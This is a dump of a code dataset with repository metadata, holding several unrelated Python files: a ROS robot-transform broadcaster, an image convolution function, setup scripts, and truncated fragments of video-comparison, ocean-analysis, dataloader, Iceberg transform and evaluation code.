] | 2 | 2019-09-04T12:28:58.000Z | 2021-09-27T13:02:48.000Z | #!/usr/bin/env python
"""Calculate transformation matrices and broadcast transform from robot's base to head markers."""
import rospy
import tf
import math
from PyKDL import Vector, Frame, Rotation
if __name__ == '__main__':
rospy.init_node('baxter_find_transformation')
listener = tf.TransformListener()
br = tf.TransformBroadcaster()
rate = rospy.Rate(50)
while not rospy.is_shutdown():
try:
(trans_OH, rot_OH) = listener.lookupTransform('/optitrack', '/bax_head', rospy.Time(0))
(trans_OA, rot_OA) = listener.lookupTransform('/optitrack', '/bax_arm', rospy.Time(0))
(trans_BG, rot_BG) = listener.lookupTransform('/base', '/left_gripper_base', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
# Rotations
rot_OH = Rotation.Quaternion(*rot_OH)
rot_OA = Rotation.Quaternion(*rot_OA)
rot_BG = Rotation.Quaternion(*rot_BG)
rot_AG = Rotation.RPY(math.pi / 2, -math.pi, math.pi / 2)
# Creating Frames
T_OH = Frame(rot_OH, Vector(*trans_OH))
T_OA = Frame(rot_OA, Vector(*trans_OA))
T_BG = Frame(rot_BG, Vector(*trans_BG))
T_AG = Frame(rot_AG, Vector(0, 0, 0))
# Finding right transformation
T_HB = T_OH.Inverse() * T_OA * T_AG * T_BG.Inverse()
T_empty_p = Vector(0, 0, 0)
T_empty_Q = Rotation.Quaternion(0, 0, 0, 1)
T_empty = Frame(T_empty_Q, T_empty_p)
# Broadcast new transformations
br.sendTransform(T_HB.p, T_HB.M.GetQuaternion(), rospy.Time.now(), 'base', 'bax_head')
br.sendTransform(T_HB.p, T_HB.M.GetQuaternion(), rospy.Time.now(), 'reference/base', 'bax_head')
br.sendTransform(T_empty.p, T_empty.M.GetQuaternion(), rospy.Time.now(), 'world', 'base')
rate.sleep()
| 39.93617 | 104 | 0.64731 |
0ce7201689d9142cf85fb513dc2bf55a86b13523 | 475 | py | Python | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.9 on 2022-01-10 12:39
from django.db import migrations, models
import django.utils.timezone
| 22.619048 | 86 | 0.621053 |
0ce7e95642a1dd2c0010de92c604aaf0452e7669 | 509 | py | Python | src/prepare_data/task_prepare_r_effective_by_rki.py | covid-19-impact-lab/sid-germany | aef4bbfb326adaf9190c6d8880e15b3d6f150d28 | [
"MIT"
] | 4 | 2021-04-24T14:43:47.000Z | 2021-07-03T14:05:21.000Z | src/prepare_data/task_prepare_r_effective_by_rki.py | covid-19-impact-lab/sid-germany | aef4bbfb326adaf9190c6d8880e15b3d6f150d28 | [
"MIT"
] | 4 | 2021-04-27T10:34:45.000Z | 2021-08-31T16:40:28.000Z | src/prepare_data/task_prepare_r_effective_by_rki.py | covid-19-impact-lab/sid-germany | aef4bbfb326adaf9190c6d8880e15b3d6f150d28 | [
"MIT"
] | null | null | null | import pandas as pd
import pytask
from src.config import BLD
| 29.941176 | 85 | 0.732809 |
0ce87ae6e8e21068ebe0de253baf4eb583ece22f | 701 | py | Python | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | import numpy as np
def convolucion(Ioriginal, kernel):
'''Mtodo encargado de realizar una convolucin a una imagen
Entrada:
Ioriginal - imagen original en forma de matrz
kernel - kernel para barrer la imagen
Salida:
res - imagen resultante'''
#fr - filas, cr - columnas
fr = len(Ioriginal)-(len(kernel)-1)
cr = len(Ioriginal[0])-(len(kernel[0])-1)
res = np.zeros((fr, cr))
#filas, matrz resultado
for i in range(len(res)):
#columnas, matrz resultado
for j in range(len(res[0])):
suma = 0
#filas, kernel
for m in range(len(kernel)):
#columnas, kernel
for n in range(len(kernel[0])):
suma += kernel[m][n] * Ioriginal[m+i][n+j]
res[i][j] = suma
return res | 26.961538 | 61 | 0.664765 |
0ce8bde6ed2f1bdf025074aeab207999685d2edc | 1,124 | py | Python | setup.py | viatoriche/vtr_utils | d877a97eabf57246cd73e975da5c56d6a343bba4 | [
"MIT"
] | null | null | null | setup.py | viatoriche/vtr_utils | d877a97eabf57246cd73e975da5c56d6a343bba4 | [
"MIT"
] | null | null | null | setup.py | viatoriche/vtr_utils | d877a97eabf57246cd73e975da5c56d6a343bba4 | [
"MIT"
] | null | null | null | import os
from distutils.core import setup
from setuptools import find_packages
package = 'vtr_utils'
version = "0.1.0"
packages = find_packages()
def get_package_data(package):
    """
    Return all files under the root package, that are not in a
    package themselves.
    """
    filepaths = []
    for dirpath, dirnames, filenames in os.walk(package):
        # Directories containing __init__.py are packages of their own
        # and are skipped entirely.
        if os.path.exists(os.path.join(dirpath, '__init__.py')):
            continue
        # Path of this directory relative to the package root.
        base = dirpath.replace(package + os.sep, '', 1)
        filepaths.extend(os.path.join(base, name) for name in filenames)
    return {package: filepaths}
setup(
name=package,
version=version,
packages=packages,
package_data=get_package_data(package),
license='MIT',
author='viatoriche',
author_email='maxim@via-net.org',
description='Small utilities',
url='https://github.com/viatoriche/vtr_utils',
download_url='https://github.com/viatoriche/vtr_utils/tarball/{}'.format(version),
install_requires=['addict', 'pytz', 'six', 'pyunpack', 'patool'],
)
| 28.820513 | 86 | 0.662811 |
0ce945d91f14b7115bc5eeecc89a0cbddf6f0ae2 | 2,925 | py | Python | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | 3 | 2022-02-08T18:03:44.000Z | 2022-03-18T18:10:43.000Z | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | 19 | 2020-05-11T15:36:35.000Z | 2022-02-08T11:26:40.000Z | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | null | null | null | from collections import defaultdict
import pytest
from radical_translations.agents.models import Organisation, Person
pytestmark = pytest.mark.django_db
| 31.793478 | 85 | 0.624274 |
0ce95b5923e81e3d937258cb29b18f328d097198 | 1,557 | py | Python | addons/website_sale_coupon/controllers/main.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | addons/website_sale_coupon/controllers/main.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | addons/website_sale_coupon/controllers/main.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import http
from odoo.addons.website_sale.controllers.main import WebsiteSale
from odoo.http import request
| 42.081081 | 95 | 0.680154 |
0ce9ddf8982fdd13b64038e356850186f884758e | 4,462 | py | Python | go/apps/http_api/tests/test_views.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/apps/http_api/tests/test_views.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/apps/http_api/tests/test_views.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | from go.apps.tests.view_helpers import AppViewsHelper
from go.base.tests.helpers import GoDjangoTestCase
| 40.93578 | 72 | 0.61385 |
0ceb15471ca6941f1a3c2803a1bcd3575ac7f39e | 5,306 | py | Python | PyPowerStore/utils/helpers.py | dell/python-powerstore | 04d6d73e4c926cf0d347cf68b24f8f11ff80f565 | [
"Apache-2.0"
] | 15 | 2020-05-06T23:46:44.000Z | 2021-12-14T08:04:48.000Z | PyPowerStore/utils/helpers.py | dell/python-powerstore | 04d6d73e4c926cf0d347cf68b24f8f11ff80f565 | [
"Apache-2.0"
] | 2 | 2020-06-09T15:19:25.000Z | 2020-08-18T18:58:59.000Z | PyPowerStore/utils/helpers.py | dell/python-powerstore | 04d6d73e4c926cf0d347cf68b24f8f11ff80f565 | [
"Apache-2.0"
] | 5 | 2020-05-06T23:46:22.000Z | 2021-05-08T03:03:07.000Z | # -*- coding: utf-8 -*-
# Copyright: (c) 2019-2021, Dell EMC
"""Helper module for PowerStore"""
import logging
from pkg_resources import parse_version
provisioning_obj = None
def prepare_querystring(*query_arguments, **kw_query_arguments):
    """Merge positional dicts and keyword arguments into one querystring dict.

    Positional arguments that are not dicts are silently ignored; keyword
    arguments take precedence over keys coming from the positional dicts.

    :return: Querystring dict.
    :rtype: dict
    """
    merged = {}
    for candidate in query_arguments:
        if isinstance(candidate, dict):
            merged.update(candidate)
    # Keyword arguments win over any duplicate keys from positional dicts.
    merged.update(kw_query_arguments)
    return merged
def get_logger(module_name, enable_log=False):
    """Return a DEBUG-level logger with the specified name.

    :param module_name: Name of the module requesting the logger.
    :type module_name: str
    :param enable_log: (optional) Whether to enable logging; when False the
        logger is created but marked disabled so logging calls are no-ops.
    :type enable_log: bool
    :return: Logger object
    :rtype: logging.Logger
    """
    LOG = logging.getLogger(module_name)
    LOG.setLevel(logging.DEBUG)
    # A disabled logger short-circuits every logging call; this replaces the
    # redundant if/else that assigned True/False explicitly.
    LOG.disabled = not enable_log
    return LOG
def is_foot_hill_or_higher():
    """Check whether the connected array runs Foothill (2.0.0.0) or newer.

    :return: True if foot hill or higher
    :rtype: bool
    """
    foothill = parse_version('2.0.0.0')
    current = provisioning_obj.get_array_version()
    # An empty/None version string is treated as "older than Foothill".
    if not current:
        return False
    return parse_version(current) >= foothill
def filtered_details(filterable_keys, filter_dict, resource_list,
                     resource_name):
    """
    Get the filtered output.

    A resource is returned only when *every* entry in ``filter_dict``
    matches it (logical AND of all filters).

    :param filterable_keys: Keys on which filters are supported.
    :type filterable_keys: list
    :param filter_dict: Dict containing the filters, operators and value.
    :type filter_dict: dict
    :param resource_list: The response of the REST api call on which
                          filter_dict is to be applied.
    :type resource_list: list
    :param resource_name: Name of the resource
    :type resource_name: str
    :return: List of dicts holding the 'id' (and 'name', where the resource
             has one) of each matching resource.
    :rtype: list
    :raises Exception: If a filter key is not in ``filterable_keys``.
    """
    err_msg = "Entered key {0} is not supported for filtering. " \
              "For {1}, filters can be applied only on {2}. "
    response = list()
    for resource in resource_list:
        count = 0
        for key in filter_dict:
            # Check if the filters can be applied on the key or not
            if key not in filterable_keys:
                raise Exception(err_msg.format(
                    key, resource_name, str(filterable_keys)))
            count = apply_operators(filter_dict, key, resource, count)
        # The resource matches only if every filter expression matched.
        if count == len(filter_dict):
            temp_dict = dict()
            temp_dict['id'] = resource['id']
            # check if resource has 'name' parameter or not.
            if resource_name not in ["CHAP config", "service config"]:
                temp_dict['name'] = resource['name']
            response.append(temp_dict)
    return response
def apply_operators(filter_dict, key, resource, count):
    """
    Returns the count for the filters applied on the keys.

    :param filter_dict: Mapping of resource keys to filter expressions of the
        form ``<operator>.<value>`` (e.g. ``eq.abc``, ``gt.5``,
        ``ilike.*foo*``).
    :type filter_dict: dict
    :param key: The resource key the current filter applies to.
    :param resource: The resource dict being evaluated.
    :type resource: dict
    :param count: Number of filters matched so far for this resource.
    :type count: int
    :return: ``count`` incremented by one if this filter matched.
    :rtype: int
    :raises Exception: If the operator is applied to an unsupported type.
    """
    # Split only on the first '.' so operand values that themselves contain
    # dots (float thresholds like 'lt.3.5', dotted strings like 'eq.a.b')
    # are preserved intact instead of being truncated at the second dot.
    split_list = filter_dict[key].split(".", 1)
    if split_list[0] == 'eq' and str(resource[key]) == str(split_list[1]):
        count += 1
    elif split_list[0] == 'neq' and str(resource[key]) != str(split_list[1]):
        count += 1
    elif split_list[0] == 'ilike':
        if not isinstance(resource[key], str):
            raise Exception('like can be applied on string type'
                            ' parameters only. Please enter a valid operator'
                            ' and parameter combination')
        # '*' acts as a wildcard marker; the bare text is searched for.
        search_val = split_list[1].replace("*", "")
        value = resource[key]
        if split_list[1].startswith("*") and \
                split_list[1].endswith("*") and \
                value.count(search_val) > 0:
            # '*text*' -> substring match anywhere in the value.
            count += 1
        elif split_list[1].startswith("*") and \
                value.endswith(search_val):
            # '*text' -> suffix match.
            count += 1
        elif value.startswith(search_val):
            # 'text' or 'text*' -> prefix match.
            count += 1
    elif split_list[0] == 'gt':
        if not isinstance(resource[key], (int, float)):
            raise Exception('greater can be applied on int type'
                            ' parameters only. Please enter a valid operator'
                            ' and parameter combination')
        if isinstance(resource[key], int) and\
                int(split_list[1]) < resource[key]:
            count += 1
        if isinstance(resource[key], float) and \
                float(split_list[1]) < resource[key]:
            count += 1
    elif split_list[0] == 'lt':
        if not isinstance(resource[key], (int, float)):
            raise Exception('lesser can be applied on int type'
                            ' parameters only. Please enter a valid operator'
                            ' and parameter combination')
        if isinstance(resource[key], int) and\
                int(split_list[1]) > resource[key]:
            count += 1
        if isinstance(resource[key], float) and \
                float(split_list[1]) > resource[key]:
            count += 1
    return count
| 35.373333 | 78 | 0.602714 |
0ceb7ee6367f4094900b7a7ad37575ea6ba9548d | 5,680 | py | Python | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | 1 | 2021-06-13T10:00:44.000Z | 2021-06-13T10:00:44.000Z | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | null | null | null | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import io
import enum
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx | 42.074074 | 170 | 0.757394 |
0cec7a7b14ee446e6efc190805ad0c86fcf9567d | 2,565 | py | Python | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=redefined-builtin
"""Tests basic functionality of the transpile function"""
from qiskit import QuantumRegister, QuantumCircuit
from qiskit import compile, BasicAer
from qiskit.transpiler import PassManager, transpile_dag, transpile
from qiskit.tools.compiler import circuits_to_qobj
from qiskit.converters import circuit_to_dag
from ..common import QiskitTestCase
| 34.2 | 100 | 0.665107 |
0cee3a5d83fc06ee8d80703cbf5bab61011eb8f9 | 7,039 | py | Python | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | 1 | 2021-07-29T13:23:58.000Z | 2021-07-29T13:23:58.000Z | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | null | null | null | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | null | null | null | import random
#x=Calculator()
#a=input()
#r=x.cal([a,a+"\n"])
#print(r[1][:-1])
#if r[0]=="error":
# print("error")
#print(x.dicetext(a,""))
| 36.661458 | 76 | 0.356016 |
0cf0a226855cb91425b2c33151d95bfc025b95b0 | 624 | py | Python | tests/retrieve/test_segment.py | openghg/openghg | 9a05dd6fe3cee6123898b8f390cfaded08dbb408 | [
"Apache-2.0"
] | 5 | 2021-03-02T09:04:07.000Z | 2022-01-25T09:58:16.000Z | tests/retrieve/test_segment.py | openghg/openghg | 9a05dd6fe3cee6123898b8f390cfaded08dbb408 | [
"Apache-2.0"
] | 229 | 2020-09-30T15:08:39.000Z | 2022-03-31T14:23:55.000Z | tests/retrieve/test_segment.py | openghg/openghg | 9a05dd6fe3cee6123898b8f390cfaded08dbb408 | [
"Apache-2.0"
] | null | null | null | # import os
# import uuid
# import numpy as np
# import pandas as pd
# import pytest
# mocked_uuid = "00000000-0000-1111-00000-000000000000"
# @pytest.fixture(scope="session")
# def data():
# filename = "bsd.picarro.1minute.248m.dat"
# dir_path = os.path.dirname(__file__)
# test_data = "../data/proc_test_data/CRDS"
# filepath = os.path.join(dir_path, test_data, filename)
# return pd.read_csv(filepath, header=None, skiprows=1, sep=r"\s+")
# @pytest.fixture
# def mock_uuid(monkeypatch):
# def mock_uuid():
# return mocked_uuid
# monkeypatch.setattr(uuid, "uuid4", mock_uuid)
| 21.517241 | 71 | 0.674679 |
0cf19d7af68dc81b523b12d529be9b1094af28ac | 891 | py | Python | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
# Read the long description from the README so PyPI renders it on the
# project page.
with open('README.md') as f:
    long_description = f.read()
setup(
    name='break_my_python',
    version='0.0.2',
    description='This package tries to breaks your python interpreter, do not install it',
    long_description=long_description,
    author='Jonathan J. Helmus',
    author_email='jjhelmus@gmail.com',
    url='http://pypi.python.org/pypi/break_my_python/',
    license='LICENSE.txt',
    py_modules=['break_my_python'],
    # NOTE(review): ships a .pth file; .pth files are executed by the
    # interpreter at startup -- presumably how this package "breaks"
    # Python. Confirm the '/' target directory resolves as intended.
    data_files=[('/', ['break_my_python.pth'])],
    classifiers=[
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ]
)
| 31.821429 | 90 | 0.655443 |
0cf1bfd01d728cb0a54ff17ffb5bf2c3afbfaf92 | 12,039 | py | Python | n4ofunc/comp.py | noaione/n4ofunc | 81a69de67284f9685d1f88cb34f7d3d2d0ce19c1 | [
"MIT"
] | 4 | 2018-05-28T05:05:01.000Z | 2020-03-24T15:01:24.000Z | n4ofunc/comp.py | noaione/n4ofunc | 81a69de67284f9685d1f88cb34f7d3d2d0ce19c1 | [
"MIT"
] | null | null | null | n4ofunc/comp.py | noaione/n4ofunc | 81a69de67284f9685d1f88cb34f7d3d2d0ce19c1 | [
"MIT"
] | null | null | null | """
MIT License
Copyright (c) 2020-present noaione
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import shutil
import sys
from functools import partial
from pathlib import Path
from typing import Dict, Generator, List, NamedTuple, NoReturn, Optional, Tuple
import vapoursynth as vs
from vsutil import get_w, get_y
from .utils import has_plugin_or_raise
__all__ = (
"check_difference",
"save_difference",
"stack_compare",
"interleave_compare",
"compare",
)
core = vs.core
def stack_compare(
    clips: List[vs.VideoNode],
    height: Optional[int] = None,
    identity: bool = False,
    max_vertical_stack: int = 2,
    interleave_only: bool = False,
):
    """
    Stack/interleave compare multiple clips.
    Probably inspired by LightArrowsEXE ``stack_compare`` function.

    Clips are stacked like this:
    -------------
    | A | C | E |
    -------------
    | B | D | F |
    ------------- -- (For max_vertical_stack = 2)
    etc...

    If clips total are missing some, it'll add an extra BlankClip.
    Formula: `multiples_of_max_vertical_stack[i] <= clip_total <= multiples_of_max_vertical_stack[i + 1]`
    If one of the clips only have `Y` plane, all other clips will be changed to use only 1 plane
    The total vertical clips can be modified using `max_vertical_stack`

    Parameters
    ----------
    clips: :class:`List[VideoNode]`
        A collection of clips or sources to compare.
    height: :class:`Optional[int]`
        Resize the stacked compare into a new height.
        If ``interleave_only`` is ``True``, this will be ignored.
    identity: :class:`bool`
        If ``True``, there will be numbering to identify each clips.
        If ``interleave_only`` is ``True``, this will be ignored.
    max_vertical_stack: :class:`int`
        The maximum number of clips to stack vertically.
        If ``interleave_only`` is ``True``, this will be ignored.
    interleave_only: :class:`bool`
        If ``True``, the output will be an interleaved comparision.

    Raises
    ------
    :class:`ValueError`
        If fewer than two clips are provided.

    Returns
    -------
    :class:`VideoNode`
        A stacked/interleaved compare of the clips.
    """
    if len(clips) < 2:
        raise ValueError("stack_compare: please provide 2 or more clips.")
    has_plugin_or_raise("sub")

    # Check for luma only clip
    only_use_luma = False
    for clip in clips:
        if clip.format.num_planes == 1:
            only_use_luma = True
            break

    if interleave_only:
        if only_use_luma:
            clips = [get_y(clip) for clip in clips]
        # Set identity
        if identity:
            clips = [
                clip.sub.Subtitle(
                    _generate_ident(
                        idx,
                        clip.width,
                        clip.height,
                    )
                )
                for idx, clip in enumerate(clips)
            ]
        # mismatch=True lets clips with differing formats interleave.
        return core.std.Interleave(clips, mismatch=True)

    # Set YUV video to Y video if only_use_luma.
    if only_use_luma:
        clips = [get_y(clip) for clip in clips]
    if identity:
        clips = [
            clip.sub.Subtitle(_generate_ident(ind, clip.width, clip.height)) for ind, clip in enumerate(clips)
        ]
    # Find needed clip for current `max_vertical_stack`, padding with
    # labelled BlankClips so every column has the same number of rows.
    if len(clips) != max_vertical_stack:
        needed_clip = _calculate_needed_clip(max_vertical_stack, len(clips))
        f_clip = clips[0]
        for _ in range(needed_clip - len(clips)):
            clips.append(
                core.std.BlankClip(f_clip).sub.Subtitle(
                    r"{\an5\fs120\b1\pos("
                    + "{},{}".format(f_clip.width / 2, f_clip.height / 2)
                    + r")}BlankClip Pad\N(Ignore)"
                )
            )
    # Split into chunks of `max_vertical_stack` and StackVertical it.
    # Input: [A, B, C, D, E, F, G, H]
    # Output: [[A, B], [C, D], [E, F], [G, H]]
    clips = [
        core.std.StackVertical(clips[i : i + max_vertical_stack])
        for i in range(0, len(clips), max_vertical_stack)
    ]
    final_clip = core.std.StackHorizontal(clips) if len(clips) > 1 else clips[0]
    if height:
        if height != final_clip.height:
            # Preserve the stacked aspect ratio when resizing.
            ar = final_clip.width / final_clip.height
            final_clip = final_clip.resize.Bicubic(
                get_w(height, ar),
                height,
            )
    return final_clip
# Convenience aliases: `interleave_compare` is `stack_compare` pinned to
# interleaved output; `compare` is a short name for the stacked variant.
interleave_compare = partial(stack_compare, interleave_only=True)
compare = stack_compare
| 35.201754 | 110 | 0.631614 |
0cf20d68ff93bb50029ab4621417fc5c929819f7 | 11,612 | py | Python | mpas_analysis/ocean/time_series_sst.py | alicebarthel/MPAS-Analysis | a8c568180abf96879e890a73e848db58642cfdb6 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | mpas_analysis/ocean/time_series_sst.py | alicebarthel/MPAS-Analysis | a8c568180abf96879e890a73e848db58642cfdb6 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | mpas_analysis/ocean/time_series_sst.py | alicebarthel/MPAS-Analysis | a8c568180abf96879e890a73e848db58642cfdb6 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # This software is open source software available under the BSD-3 license.
#
# Copyright (c) 2020 Triad National Security, LLC. All rights reserved.
# Copyright (c) 2020 Lawrence Livermore National Security, LLC. All rights
# reserved.
# Copyright (c) 2020 UT-Battelle, LLC. All rights reserved.
#
# Additional copyright and license information can be found in the LICENSE file
# distributed with this code, or at
# https://raw.githubusercontent.com/MPAS-Dev/MPAS-Analysis/master/LICENSE
from __future__ import absolute_import, division, print_function, \
unicode_literals
from mpas_analysis.shared import AnalysisTask
from mpas_analysis.shared.plot import timeseries_analysis_plot, savefig
from mpas_analysis.shared.time_series import combine_time_series_with_ncrcat
from mpas_analysis.shared.io import open_mpas_dataset
from mpas_analysis.shared.timekeeping.utility import date_to_days, \
days_to_datetime
from mpas_analysis.shared.io.utility import build_config_full_path, \
make_directories, check_path_exists
from mpas_analysis.shared.html import write_image_xml
# }}}
# vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python
| 38.072131 | 79 | 0.577678 |
0cf233053cbaff62ed1842427e42c01b9e93c0c4 | 3,682 | py | Python | codes/data_scripts/test_dataloader.py | DengpanFu/mmsr | addfabdaee86d2f9e41988dcfe92a817c5efe7ab | [
"Apache-2.0"
] | null | null | null | codes/data_scripts/test_dataloader.py | DengpanFu/mmsr | addfabdaee86d2f9e41988dcfe92a817c5efe7ab | [
"Apache-2.0"
] | null | null | null | codes/data_scripts/test_dataloader.py | DengpanFu/mmsr | addfabdaee86d2f9e41988dcfe92a817c5efe7ab | [
"Apache-2.0"
] | null | null | null | import sys
import os.path as osp
import math
import torchvision.utils
sys.path.append(osp.dirname(osp.dirname(osp.abspath(__file__))))
from data import create_dataloader, create_dataset # noqa: E402
from utils import util # noqa: E402
# Entry point when the script is executed directly (not on import).
if __name__ == "__main__":
    main()
| 35.066667 | 99 | 0.528246 |
0cf243e0f912db385063a422e6bbf35dbe9d0972 | 3,663 | py | Python | python/iceberg/api/transforms/transforms.py | moulimukherjee/incubator-iceberg | bf7edc4b325df6dd80d86fea0149d2be0ad09468 | [
"Apache-2.0"
] | 58 | 2019-09-10T20:51:26.000Z | 2022-03-22T11:06:09.000Z | python/iceberg/api/transforms/transforms.py | moulimukherjee/incubator-iceberg | bf7edc4b325df6dd80d86fea0149d2be0ad09468 | [
"Apache-2.0"
] | 292 | 2019-07-23T04:33:18.000Z | 2021-07-26T04:28:22.000Z | python/iceberg/api/transforms/transforms.py | moulimukherjee/incubator-iceberg | bf7edc4b325df6dd80d86fea0149d2be0ad09468 | [
"Apache-2.0"
] | 26 | 2019-08-28T23:59:03.000Z | 2022-03-04T08:54:08.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
from .bucket import Bucket
from .dates import Dates
from .identity import Identity
from .timestamps import Timestamps
from .truncate import Truncate
from ..types import (TypeID)
"""
Factory methods for transforms.
<p>
Most users should create transforms using a
{@link PartitionSpec.Builder#builderFor(Schema)} partition spec builder}.
@see PartitionSpec#builderFor(Schema) The partition spec builder.
"""
| 32.705357 | 78 | 0.65329 |
0cf5f33e0cfd554440d95e9093a443f85242c9cf | 3,067 | py | Python | biocodes/re_eval.py | yjc9696/biobert-my | ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3 | [
"Apache-2.0"
] | null | null | null | biocodes/re_eval.py | yjc9696/biobert-my | ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3 | [
"Apache-2.0"
] | 3 | 2020-11-13T17:48:47.000Z | 2022-02-09T23:43:16.000Z | biocodes/re_eval.py | yjc9696/biobert-my | ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3 | [
"Apache-2.0"
] | null | null | null | import argparse
import numpy as np
import pandas as pd
import sklearn.metrics
import sklearn.metrics
# Command-line interface: paths to the model predictions and the gold
# answers, plus the task name that selects the scoring scheme below.
parser = argparse.ArgumentParser(description='')
parser.add_argument('--output_path', type=str, help='')
parser.add_argument('--answer_path', type=str, help='')
parser.add_argument('--task', type=str, default="binary", help='default:binary, possible other options:{chemprot}')
args = parser.parse_args()

# Gold labels (with header) and raw prediction scores (no header).
testdf = pd.read_csv(args.answer_path, sep="\t")
preddf = pd.read_csv(args.output_path, sep="\t", header=None)

# binary
if args.task == "binary":
